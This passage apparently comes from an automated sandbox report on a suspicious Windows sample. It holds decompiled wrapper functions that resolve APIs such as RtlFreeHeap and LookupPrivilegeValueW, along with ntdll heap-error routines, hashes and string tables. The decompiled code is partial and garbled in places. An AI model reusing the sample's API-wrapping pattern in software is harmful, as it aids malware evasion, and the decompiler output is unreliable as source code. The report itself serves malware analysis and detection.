				return _t13;
			}

0x00406ea0
0x00406eaf
0x00406eb3
0x00406ebe
0x00406ece
0x00406ede
0x00406ee3
0x00406eea
0x00406eed
0x00406efa
0x00406efc
0x00406efe
0x00406f1b
0x00406f1b
0x00000000
0x00406f1d
0x00406f22

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00406EFA

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
Instruction ID: 0a220d94033460800f8d40ca761919bb4cbf9dd730bb76aeff12ae2732b8fbad
Opcode Fuzzy Hash: 86aabadf8e07445ceb82468d69cbbbdf953cdd515357127d60cc95a49993ee3a
Instruction Fuzzy Hash: C101FC31A4021977E720BA959C03FFF776C5F41B54F054019FF04BA1C2D6A86D0546F9

Uniqueness

Uniqueness Score: -1.00%

Function 00417FA7, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CCC2,0040CCC2,00000041,00000000,?,00408935), ref: 00418030

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8e4eadb4a1c00411362cba737a4c62b41c255c677aa3bc49835cf14671195ca5
Instruction ID: e5e2e031b0e742ffc5d861d767c7a9dc227be75d8bd3b72e60b28aa49311c108
Opcode Fuzzy Hash: 8e4eadb4a1c00411362cba737a4c62b41c255c677aa3bc49835cf14671195ca5
Instruction Fuzzy Hash: 5B016DB5200208ABDB24DF89CC41EEB37ADEF88354F158159FE1C97241C934E8508BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00417ED2, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00417ED2(void* __eax, void* __edx, void* __eflags, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				char _t15;
				signed char* _t17;
				void* _t25;

				_pop(_t17);
				asm("o16 loopne 0x4b");
				if(__eflags <= 0) {
					 *_t17 =  ~( *_t17);
					_push(_t29);
					_t12 = _a8;
					_t5 = _t12 + 0xc74; // 0xc74
					E00418790(_t25, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
					_t15 = RtlFreeHeap(_a12, _a16, _a20); // executed
					return _t15;
				} else {
					return __eax;
				}
			}

0x00417ed3
0x00417ed5
0x00417ed8
0x00417e98
0x00417ea0
0x00417ea3
0x00417eaf
0x00417eb7
0x00417ecd
0x00417ed1
0x00417eda
0x00417eda
0x00417eda

APIs

RtlFreeHeap.NTDLL(00000060,004088C3,?,?,004088C3,00000060,00000000,00000000,?,?,004088C3,?,00000000), ref: 00417ECD

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2120b6026cb09f4da02fcb840bb4584844ea7904d27e095ef9f74338df278916
Instruction ID: 2b25174e765f06398b6e9f7f3d853c9a5a1d73eaf6ef0d5b8cd2a1caefd60e9e
Opcode Fuzzy Hash: 2120b6026cb09f4da02fcb840bb4584844ea7904d27e095ef9f74338df278916
Instruction Fuzzy Hash: 10F0A077204204AFD719DF95CC04FE737A9AF84320F24408AF9095B292C535E81087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00418000, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418000(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t7;
				int _t10;
				void* _t15;

				_t7 = _a4;
				E00418790(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418003
0x0041801a
0x00418030
0x00418034

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CCC2,0040CCC2,00000041,00000000,?,00408935), ref: 00418030

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 0a706448c6c07ba1e6b2255bf273e2ca868e64ebec3b4ea137d33bbafb59c7b6
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 57E01AB56002086BDB10DF49CC85EE737ADAF88660F118559BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00417EA0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417EA0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418790(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00417eaf
0x00417eb7
0x00417ecd
0x00417ed1

APIs

RtlFreeHeap.NTDLL(00000060,004088C3,?,?,004088C3,00000060,00000000,00000000,?,?,004088C3,?,00000000), ref: 00417ECD

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 1e11c670efb4203027c0b4071ff50d9bfdf372f3f1b500429a6c2190be3e7db9
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 4DE04FB52102046BD714DF59CC45EE777ADEF88760F114559FE1857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00417EE0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417EE0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418790(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00417ee3
0x00417efa
0x00417f08

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00417F08

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: a7a5b7fd0c486ba3a00f780e23918bda67c8832acaa876c7f9c7831b0dba985a
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 37D012756102147BD620DB99CC85FD7779CDF48760F118469BA1C5B241C531BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E49694

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4375ae15a58cf199eb05a54b2470ad63f0f08ce6700efa05e293671ca00ab6e
Instruction ID: f6dd106d9238fa98fe8dce7d7923894bf02c4bc3149433ebfbf360d8ffd08ebf
Opcode Fuzzy Hash: f4375ae15a58cf199eb05a54b2470ad63f0f08ce6700efa05e293671ca00ab6e
Instruction Fuzzy Hash: C2B09B71D464C5C6D711D7605A087177A04B7D0745F17D465D1021641B477CC4D5F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EBB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** enter .exr %p for the exception record, xrefs: 00EBB4F1
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00EBB484
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00EBB53F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00EBB476
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00EBB314
*** then kb to get the faulting stack, xrefs: 00EBB51C
The resource is owned shared by %d threads, xrefs: 00EBB37E
This failed because of error %Ix., xrefs: 00EBB446
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00EBB38F
The instruction at %p tried to %s , xrefs: 00EBB4B6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00EBB323
The resource is owned exclusively by thread %p, xrefs: 00EBB374
write to, xrefs: 00EBB4A6
a NULL pointer, xrefs: 00EBB4E0
The instruction at %p referenced memory at %p., xrefs: 00EBB432
*** An Access Violation occurred in %ws:%s, xrefs: 00EBB48F
<unknown>, xrefs: 00EBB27E, 00EBB2D1, 00EBB350, 00EBB399, 00EBB417, 00EBB48E
Go determine why that thread has not released the critical section., xrefs: 00EBB3C5
read from, xrefs: 00EBB4AD, 00EBB4B2
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00EBB305
*** enter .cxr %p for the context, xrefs: 00EBB50D
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00EBB47D
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00EBB39B
*** A stack buffer overrun occurred in %ws:%s, xrefs: 00EBB2F3
*** Resource timeout (%p) in %ws:%s, xrefs: 00EBB352
The critical section is owned by thread %p., xrefs: 00EBB3B9
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00EBB3D6
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00EBB2DC
*** Inpage error in %ws:%s, xrefs: 00EBB418
an invalid address, %p, xrefs: 00EBB4CF

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: c28d586e6f222f393ef1024d5166f35bed6ec63ec253f0f0ff0993a7227c9960
Instruction ID: ef8ebba60440ddedc6546801de01aba7e854d52c293f7f7611531daacae44832
Opcode Fuzzy Hash: c28d586e6f222f393ef1024d5166f35bed6ec63ec253f0f0ff0993a7227c9960
Instruction Fuzzy Hash: AC811132A00204FFCB266B45DC46EBB3B67AF46B55F029045F6047B263E3E18951DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00EC1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00EC1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xde48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00E0B150();
				} else {
					E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xef589c);
				E00E0B150("Heap error detected at %p (heap handle %p)\n",  *0xef58a0);
				_t27 =  *0xef5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00EC1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00E0B150();
				} else {
					E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00E0B150("Error code: %d - %s\n",  *0xef5898);
				_t113 =  *0xef58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00E0B150();
					} else {
						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00E0B150("Parameter1: %p\n",  *0xef58a4);
				}
				_t115 =  *0xef58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00E0B150();
					} else {
						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00E0B150("Parameter2: %p\n",  *0xef58a8);
				}
				_t117 =  *0xef58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00E0B150();
					} else {
						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00E0B150("Parameter3: %p\n",  *0xef58ac);
				}
				_t119 =  *0xef58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00E0B150();
					} else {
						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xef58b4);
					E00E0B150("Last known valid blocks: before - %p, after - %p\n",  *0xef58b0);
				} else {
					_t120 =  *0xef58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00E0B150();
				} else {
					E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00E0B150("Stack trace available at %p\n", 0xef58c0);
			}

0x00ec1c10
0x00ec1c16
0x00ec1c1e
0x00ec1c3d
0x00ec1c3e
0x00ec1c20
0x00ec1c35
0x00ec1c3a
0x00ec1c44
0x00ec1c55
0x00ec1c5a
0x00ec1c65
0x00ec1c67
0x00000000
0x00ec1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ec1c67
0x00ec1cdc
0x00ec1ce5
0x00ec1d04
0x00ec1d05
0x00ec1ce7
0x00ec1cfc
0x00ec1d01
0x00ec1d0b
0x00ec1d17
0x00ec1d1f
0x00ec1d25
0x00ec1d30
0x00ec1d4f
0x00ec1d50
0x00ec1d32
0x00ec1d47
0x00ec1d4c
0x00ec1d61
0x00ec1d67
0x00ec1d68
0x00ec1d6e
0x00ec1d79
0x00ec1d98
0x00ec1d99
0x00ec1d7b
0x00ec1d90
0x00ec1d95
0x00ec1daa
0x00ec1db0
0x00ec1db1
0x00ec1db7
0x00ec1dc2
0x00ec1de1
0x00ec1de2
0x00ec1dc4
0x00ec1dd9
0x00ec1dde
0x00ec1df3
0x00ec1df9
0x00ec1dfa
0x00ec1e00
0x00ec1e0a
0x00ec1e13
0x00ec1e32
0x00ec1e33
0x00ec1e15
0x00ec1e2a
0x00ec1e2f
0x00ec1e39
0x00ec1e4a
0x00ec1e02
0x00ec1e02
0x00ec1e08
0x00000000
0x00000000
0x00ec1e08
0x00ec1e5b
0x00ec1e7a
0x00ec1e7b
0x00ec1e5d
0x00ec1e72
0x00ec1e77
0x00ec1e95

Strings

HEAP[%wZ]: , xrefs: 00EC1C30, 00EC1CF7, 00EC1D42, 00EC1D8B, 00EC1DD4, 00EC1E25, 00EC1E6D
Last known valid blocks: before - %p, after - %p, xrefs: 00EC1E45
heap_failure_invalid_argument, xrefs: 00EC1CAD
heap_failure_buffer_underrun, xrefs: 00EC1C9F
heap_failure_generic, xrefs: 00EC1C7C
heap_failure_listentry_corruption, xrefs: 00EC1CD0
Parameter3: %p, xrefs: 00EC1DEE
heap_failure_unknown, xrefs: 00EC1C75
heap_failure_entry_corruption, xrefs: 00EC1C83
heap_failure_usage_after_free, xrefs: 00EC1CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 00EC1CD7
heap_failure_virtual_block_corruption, xrefs: 00EC1C91
heap_failure_multiple_entries_corruption, xrefs: 00EC1C8A
Parameter1: %p, xrefs: 00EC1D5C
Error code: %d - %s, xrefs: 00EC1D12
Stack trace available at %p, xrefs: 00EC1E86
heap_failure_internal, xrefs: 00EC1C6E
heap_failure_buffer_overrun, xrefs: 00EC1C98
Parameter2: %p, xrefs: 00EC1DA5
heap_failure_freelists_corruption, xrefs: 00EC1CC9
heap_failure_block_not_busy, xrefs: 00EC1CA6
HEAP: , xrefs: 00EC1C16, 00EC1C3D, 00EC1D04, 00EC1D4F, 00EC1D98, 00EC1DE1, 00EC1E32, 00EC1E7A
heap_failure_invalid_allocation_type, xrefs: 00EC1CB4
Heap error detected at %p (heap handle %p), xrefs: 00EC1C50
heap_failure_cross_heap_operation, xrefs: 00EC1CC2

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 3bbc091947992a9a0270b758694a1e347bcb00893e75b92abaf275a634303a67
Instruction ID: cdaa78bb75e5495ae6b613fbd6ed119f31c955ec2aeab4728a1b04643dfd2446
Opcode Fuzzy Hash: 3bbc091947992a9a0270b758694a1e347bcb00893e75b92abaf275a634303a67
Instruction Fuzzy Hash: FA611A33551588DFC305A745D955F7173E4FB05B20B1AD0BEF50ABB3A3C6218C82CA29

Uniqueness

Uniqueness Score: -1.00%

Function 00E13D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00E13D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00E11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00E11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00E11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00E11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00E11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00E24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00E4F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00E51370(_t276, 0xde4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00E4BB40(0,  &_v68, _t170);
									if(L00E143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00E4BB40(_t257,  &_v68, _t243);
								if(L00E143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00E51370(_t278, 0xde4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00E24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00E4F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00E51370(_v16, 0xde4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00E4BB40(_t262,  &_v68, _t244);
								if(L00E143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00E51370(_t282, 0xde4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00E4BB40(_t262,  &_v68, _t201);
							if(L00E143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00E24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00E4F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00E51370(_t280, 0xde4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00E4BB40(_t267,  &_v68, _t245);
							if(L00E143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00E51370(_t284, 0xde4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00E4BB40(_t267,  &_v68, _t224);
						if(L00E143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00e13d3c
0x00e13d42
0x00e13d44
0x00e13d46
0x00e13d49
0x00e13d4c
0x00e13d4f
0x00e13d52
0x00e13d55
0x00e13d58
0x00e13d5b
0x00e13d5f
0x00e13d61
0x00e13d66
0x00e68213
0x00e68218
0x00e14085
0x00e14088
0x00e1408e
0x00e14094
0x00e1409a
0x00e140a0
0x00e140a6
0x00e140a9
0x00e140af
0x00e140b6
0x00e140bd
0x00e140bd
0x00e13d83
0x00e6821f
0x00e68229
0x00e68238
0x00e68238
0x00e6823d
0x00e6823d
0x00e13da0
0x00e13daf
0x00e13db5
0x00e13dba
0x00e13dba
0x00e13dd4
0x00e13e94
0x00e13eab
0x00e13f6d
0x00e13f84
0x00e1406b
0x00e1406b
0x00e1406e
0x00e1406e
0x00e14070
0x00e14074
0x00e68351
0x00e68351
0x00e1407a
0x00e1407f
0x00e6835d
0x00e68370
0x00e68377
0x00e68379
0x00e6837c
0x00e6837c
0x00e6835d
0x00000000
0x00e1407f
0x00e13f8a
0x00e13f8d
0x00e13f90
0x00e13f95
0x00e6830d
0x00e6830f
0x00e13f9b
0x00e13fac
0x00e13fae
0x00e13fb1
0x00e13fb1
0x00e13fb6
0x00e68317
0x00e6831a
0x00000000
0x00e13fbc
0x00e13fc1
0x00e13fc9
0x00e13fd7
0x00e13fda
0x00e13fdd
0x00e14021
0x00e14021
0x00e14029
0x00e14030
0x00e14044
0x00e14046
